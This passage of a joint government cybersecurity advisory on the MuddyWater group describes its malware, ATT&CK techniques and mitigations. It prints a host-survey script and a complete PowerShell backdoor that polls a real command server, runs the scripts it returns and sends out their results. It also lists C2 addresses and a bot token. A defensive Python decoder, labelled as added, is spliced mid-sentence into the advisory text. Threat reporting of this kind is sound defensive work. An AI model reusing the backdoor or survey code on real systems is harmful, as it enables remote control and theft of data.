The APT group has also used variations of Microsoft (e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].\n\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve\u2019s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)], [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].\n\n**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. \n\nSee Appendix B for further analysis of Small Sieve malware.\n\n#### **Canopy**\n\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. \n\nIn the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. 
When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.\n\nThe first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)]. The file executes a command to run the second .wsf.\n\nThe second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [[TA0035](<https://attack.mitre.org/versions/v10/tactics/TA0035/>)] the victim system\u2019s IP address, computer name, and username [[T1005](<https://attack.mitre.org/versions/v10/techniques/T1005/>)]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, `http[:]88.119.170[.]124`, via an HTTP POST request [[T1041](<https://attack.mitre.org/versions/v10/techniques/T1041/>)].\n\n#### **Mori**\n\nMuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group\u2019s C2 infrastructure [[T1572](<https://attack.mitre.org/versions/v10/techniques/T1572/>)]. \n\nAccording to one sample analyzed by CISA, `FML.dll`, Mori uses a DLL written in C++ that is executed with `regsvr32.exe` with export `DllRegisterServer`; this DLL appears to be a component to another program. `FML.dll` contains approximately 200MB of junk data [[T1001.001](<https://attack.mitre.org/versions/v10/techniques/T1001/001/>)] in a resource directory 205, number 105. Upon execution, `FML.dll` creates a mutex, `0x50504060`, and performs the following tasks:\n\n * Deletes the file `FILENAME.old` and deletes file by registry value. 
The filename is the DLL file with a `.old` extension.\n * Resolves networking APIs from strings that are ADD-encrypted with the key `0x05`.\n * Uses Base64 and JavaScript Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.\n * Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>)].\n * Reads and/or writes data from the following Registry Keys, `HKLM\\Software\\NFC\\IPA` and `HKLM\\Software\\NFC\\(Default)`.\n\n#### **POWERSTATS**\n\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059>)]. \n\nCNMF has posted samples further detailing the different parts of MuddyWater\u2019s new suite of tools\u2014along with JavaScript files used to establish connections back to malicious infrastructure\u2014to the malware aggregation tool and repository, [Virus Total](<http://www.virustotal.com/en/user/CYBERCOM_Malware_Alert>). Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.\n\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability ([CVE-2020-1472](<https://vulners.com/cve/CVE-2020-1472>)) and the Microsoft Exchange memory corruption vulnerability ([CVE-2020-0688](<https://vulners.com/cve/CVE-2020-0688>)). 
See [CISA\u2019s Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>) for additional Iranian APT group-specific vulnerability exploits.\n\n#### **Survey Script**\n\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., `;;` in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\n\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S += $ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S += [System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;\n\n#### **Newly Identified PowerShell Backdoor**\n\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. 
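As an added example that is not part of the advisory, the Python below mirrors the backdoor's XOR-then-Base64 scheme and parses the `;;`-delimited survey string from the previous section, so that a captured cookie value or response body can be decoded for analysis. It goes beyond the page's fixed key by brute-forcing the single-byte key; the host data in SAMPLE_SURVEY is constructed, and pairing the survey output with this particular encoder is an assumption for illustration.

```python
"""Defender-side decoder for the single-byte XOR + Base64 scheme used by the
PowerShell backdoor above, plus a parser for the ';;'-delimited survey string.
Added example, not code from the advisory; sample values are constructed."""
import base64
import string
from typing import Dict, Optional

XOR_KEY = 0x02        # key passed as the second argument to encode/decode in the backdoor
SURVEY_DELIM = ";;"   # field delimiter produced by the survey script
SURVEY_FIELDS = (
    "os_name", "ip_addresses", "os_architecture",
    "hostname", "domain", "username", "antivirus",
)


def xor_b64_encode(text: str, key: int = XOR_KEY) -> str:
    """Mirror of the backdoor's encode(): UTF-8 bytes, XOR each byte with key, Base64."""
    data = bytes(b ^ key for b in text.encode("utf-8"))
    return base64.b64encode(data).decode("ascii")


def xor_b64_decode(blob: str, key: int = XOR_KEY) -> str:
    """Mirror of decode(): Base64, XOR each byte with key, UTF-8 text.

    Raises ValueError when the blob is not valid Base64, so a caller scanning
    arbitrary cookie values can skip traffic that does not match the scheme.
    """
    try:
        data = base64.b64decode(blob.strip(), validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValueError("not valid Base64") from exc
    return bytes(b ^ key for b in data).decode("utf-8", errors="replace")


def recover_xor_key(blob: str, marker: str = SURVEY_DELIM) -> Optional[int]:
    """Brute-force the 256 possible single-byte keys for a captured blob.

    Generalizes the page's fixed key 0x02: a key is accepted when every decoded
    byte is printable ASCII and the expected marker (the survey delimiter by
    default) is present. Returns None when no key yields plausible text.
    """
    try:
        data = base64.b64decode(blob.strip(), validate=True)
    except ValueError:
        return None
    printable = set(string.printable.encode("ascii"))
    for key in range(256):
        plain = bytes(b ^ key for b in data)
        if all(b in printable for b in plain) and marker.encode("ascii") in plain:
            return key
    return None


def parse_survey(survey: str) -> Dict[str, object]:
    """Split a decoded survey string into named fields.

    The survey script emits: OS name ;; IPs ;; architecture ;; hostname ;;
    domain ;; username ;; antivirus names. The IP field begins with a space
    (the script strips only the leading comma), and several antivirus names
    are space-joined by PowerShell, so that field is kept as one string.
    """
    parts = survey.split(SURVEY_DELIM)
    if len(parts) != len(SURVEY_FIELDS):
        raise ValueError(f"expected {len(SURVEY_FIELDS)} fields, got {len(parts)}")
    rec: Dict[str, object] = dict(zip(SURVEY_FIELDS, (p.strip() for p in parts)))
    ips = str(rec["ip_addresses"]).split(",")
    rec["ip_addresses"] = [ip.strip() for ip in ips if ip.strip()]
    return rec


# Constructed sample: what the survey script would produce on a hypothetical host,
# encoded the way the backdoor's encode() would before placing it in the cookie header.
SAMPLE_SURVEY = (
    "Microsoft Windows 10 Pro|C:\\WINDOWS|\\Device\\Harddisk0\\Partition2;; 10.0.0.5, 10.0.0.6"
    ";;64-bit;;ws01.corp.example;;corp.example;;jdoe;;Windows Defender"
)
SAMPLE_COOKIE = xor_b64_encode(SAMPLE_SURVEY)


def analyse_cookie(cookie_value: str) -> Dict[str, object]:
    """Analyst pipeline: recover the key, decode the value, parse the survey fields."""
    key = recover_xor_key(cookie_value)
    if key is None:
        raise ValueError("no single-byte XOR key yields a survey string")
    rec = parse_survey(xor_b64_decode(cookie_value, key))
    rec["xor_key"] = key
    return rec


if __name__ == "__main__":
    for field, value in analyse_cookie(SAMPLE_COOKIE).items():
        print(f"{field:16} {value}")
```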
The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

```powershell
function encode($txt,$key){
  $enByte = [Text.Encoding]::UTF8.GetBytes($txt);
  for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}
  $encodetxt = [Convert]::ToBase64String($enByte);
  return $encodetxt;
}
function decode($txt,$key){
  $enByte = [System.Convert]::FromBase64String($txt);
  for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}
  $dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);
  return $dtxt;
}
$global:tt=20;
while($true){
  try{
    $w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');
    $w.proxy = [Net.WebRequest]::GetSystemWebProxy();
    $r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();
    if($r.Length -gt 0){
      $res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));
      $wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>');
      $wr.proxy = [Net.WebRequest]::GetSystemWebProxy();
      $wr.Headers.Add('cookie',(encode $res 2));
      $wr.GetResponse().GetResponseStream();
    }
  }catch {}
  Start-Sleep -Seconds $global:tt;
}
```

### MITRE ATT&CK Techniques

[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&CK techniques listed in table 1.

_Table 1: MuddyWater ATT&CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_

Technique Title | ID | Use
---|---|---
**Reconnaissance** | |
Gather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails.
**Resource Development** | |
Acquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of the legitimate tools ConnectWise and RemoteUtilities for access to target environments.
**Initial Access** | |
Phishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.
Phishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links.
**Execution** | |
Windows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used tools developed in Python, including Out1.
Command and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
**Persistence** | |
Scheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word Template, `Normal.dotm`, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added the Registry Run key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding` to establish persistence.
**Privilege Escalation** | |
Abuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass user account control.
Credentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1555/003>) | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
**Defense Evasion** | |
Obfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Steganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`.
Compile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the .NET `csc.exe` tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. For example, Small Sieve uses variations of Microsoft (Microsift) and Outlook in its filenames to attempt to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>) | MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP | [T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>) | MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`.
Execution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings.
**Credential Access** | |
OS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`.
OS Credential Dumping: LSA Secrets | [T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>) | MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files | [T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>) | MuddyWater has run a tool that steals passwords saved in victim email.
**Discovery** | |
System Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery | [T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>) | MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."
Account Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe net user /domain` to enumerate domain users.
Software Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
**Collection** | |
Screen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim’s machine.
Archive Collected Data: Archive via Utility | [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded.
**Command and Control** | |
Application Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications. For example, Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has also used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications, including Base64 encoding.
Data Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
**Exfiltration** | |
Exfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data.

### Mitigations

#### Protective Controls and Architecture

 * **Deploy application control software to limit the applications and executable code that can be run by users.** Email attachments and files downloaded via links in emails often contain executable code.

#### Identity and Access Management

 * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems.
 * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets because their system, once infected, enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information.

#### Phishing Protection

 * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing.
 * **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.
 * **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**
 * **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.
 * **Adopt threat reputation services at the network device, operating system, application, and email service levels.** Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks.

#### Vulnerability and Configuration Management

 * **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.** Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

### Additional Resources

 * For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage – Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release – Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>).
 * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.
 * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States, [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
 * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
 * The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.

### References

[[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)
[[2] MITRE ATT&CK: MuddyWater](<https://attack.mitre.org/versions/v10/groups/G0069/>)

### Caveats

The information you have accessed or received is being provided “as is” for informational purposes only.
The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

### Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

### Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity:

### Appendix B: Small Sieve

**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

#### **Metadata**

_Table 2: Gram.app.exe Metadata_

**Filename** | gram_app.exe
---|---
**Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key
**Size** | 16999598 bytes
**MD5** | 15fa3b32539d7453a9a85958b77d4c95
**SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282
**SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054
**Compile Time** | 2021-09-25 21:57:46 UTC

_Table 3: Index.exe Metadata_

**Filename** | index.exe
---|---
**Description** | The final PyInstaller-bundled Python 3.9 backdoor
**Size** | 17263089 bytes
**MD5** | 5763530f25ed0ec08fb26a30c04009f1
**SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992
**SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2
**Compile Time** | 2021-08-01 04:39:46 UTC

#### **Functionality**

##### **_Installation_**

Small Sieve is distributed as a large (16MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user’s `AppData/Roaming` directory and is added as a Run key in the registry to enable persistence after reboot.

The installer then executes the backdoor with the “Platypus” argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the registry persistence key: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift`.

##### **_Configuration_**

The backdoor attempts to restore previously initialized session data from `%LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt`.

If this file does not exist, then it uses the hardcoded values listed in table 4:

_Table 4: Credentials and Session Values_

Field | Value | Description
---|---|---
Chat ID | 2090761833 | This is the Telegram Channel ID that beacons are sent to and from which tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.
Bot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware.
Telegram Token | 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API.

#### **Tasking**

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the `python-telegram-bot` module.

Two task formats are supported:

 * `/start` – no argument is passed; this causes the beacon information to be repeated.
 * `/com[BotID] [command]` – for issuing commands passed in the argument.

The following commands are supported by the second of these formats, as described in table 5:

_Table 5: Supported Commands_

Command | Description
---|---
`delete` | This command causes the backdoor to exit; it does not remove persistence.
`download url""filename` | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function.
`change token""newtoken` | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file.
`disconnect` | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued.

Any commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.

#### **Defense Evasion**

##### **_Anti-Sandbox_**

_Figure 1: Execution Guardrail_

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line.

##### **_String obfuscation_**

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded.
A decryption script is included in Appendix B.

#### **Communications**

##### **_Beacon Format_**

Before listening for tasking using CommandHandler objects from the `python-telegram-bot` module, a beacon is generated manually using the standard `requests` library:

_Figure 2: Manually Generated Beacon_

The hex host data is encoded using the byte shuffling algorithm described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to:

`admin/WINDOMAIN1 | 10.17.32.18`

##### **_Traffic obfuscation_**

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

_Figure 3: Python3 implementation of the hex byte shuffling algorithm (image not reproduced)_